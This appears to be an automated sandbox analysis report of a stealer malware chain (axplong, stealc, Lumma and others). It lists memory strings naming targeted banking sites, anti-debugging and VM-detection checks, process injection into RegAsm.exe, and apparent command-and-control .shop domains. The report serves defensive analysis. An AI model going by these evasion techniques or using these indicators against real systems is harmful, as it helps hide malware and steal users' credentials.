Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a.rdata$.refptr.__xi_z.rdata$.refptr.__xi_aWinMainCRTStartup.l_startwmainCRTStartup.rdata$.refptr._gnu_exception_handler.rdata$.refptr._matherr.CRT$XCAA.CRT$XIAA.debug_info.debug_abbrev.debug_loc.debug_aranges.debug_ranges.debug_line.debug_str.rdata$zzz.debug_frame__gcc_register_frame__gcc_deregister_frameIsRunningAsAdminRestartAsAdminIsProcessRunningMonitorAndLaunchProcessIsVirtualMachinecheck_device_infoCheckForVirtualMachineIsAnotherInstanceRunningCopySelfToTempExecuteCommandget_os_nameget_system_infobase64_encodebase64_decodeexecute_command_from_responsesend_post_request__do_global_dtors__do_global_ctors.rdata$.refptr.__CTOR_LIST__initializedmy_lconv_init__security_init_cookie.data$__security_cookie.data$__security_cookie_complement__report_gsfailureGS_ContextRecordGS_ExceptionRecordGS_ExceptionPointers__dyn_tls_dtor__dyn_tls_init.rdata$.refptr._CRT_MT__tlregdtor__mingw_raise_matherrstUserMathErr__mingw_setusermatherr_decode_pointer_encode_pointer__report_error__write_memory.part.0maxSections_pei386_runtime_relocatorwas_init.95200.rdata$.refptr.__RUNTIME_PSEUDO_RELOC_LIST_END__.rdata$.refptr.__RUNTIME_PSEUDO_RELOC_LIST__.text.unlikely.xdata.unlikely.pdata.unlikely__mingw_SEH_error_handler__mingw_init_ehandlerwas_here.95039emu_pdataemu_xdata_gnu_exception_handler__mingwthr_run_key_dtors.part.0__mingwthr_cskey_dtor_list___w64_mingwthr_add_key_dtor__mingwthr_cs_init___w64_mingwthr_remove_key_dtor__mingw_TLScallbackpseudo-reloc-list.c_ValidateImageBase.part.0_ValidateImageBase_FindPESection
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005DD7000.00000004.00000020.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3060091921.0000000006DA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe`,
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CheckForVirtualMachine
Source: file.exe, 00000000.00000002.2227763808.0000000000D55000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2262996473.0000000000405000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2276480670.0000000000405000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3515196648.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05580C46 rdtsc 0_2_05580C46
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00507560 LdrInitializeThunk, 16_2_00507560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00407B01
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0023645B mov eax, dword ptr fs:[00000030h] 6_2_0023645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0023A1C2 mov eax, dword ptr fs:[00000030h] 6_2_0023A1C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041914C mov eax, dword ptr fs:[00000030h] 15_2_0041914C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004114A6 mov ecx, dword ptr fs:[00000030h] 15_2_004114A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041EFD8 GetProcessHeap, 15_2_0041EFD8
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00407B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407C63 SetUnhandledExceptionFilter, 15_2_00407C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00407D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0040DD78
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: needmoney.exe PID: 3360, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Code function: 8_2_031624E9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 8_2_031624E9
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: reinforcenh.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: stogeneratmns.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: fragnantbui.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: drawzhotdog.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: vozmeatillu.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: offensivedzvju.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ghostreedmnu.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: gutterydhowi.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: lootebarrkeyn.shop
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84F008
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4DC000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1048008
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A6B008
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B33008
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45D000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9B1008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe "C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe"
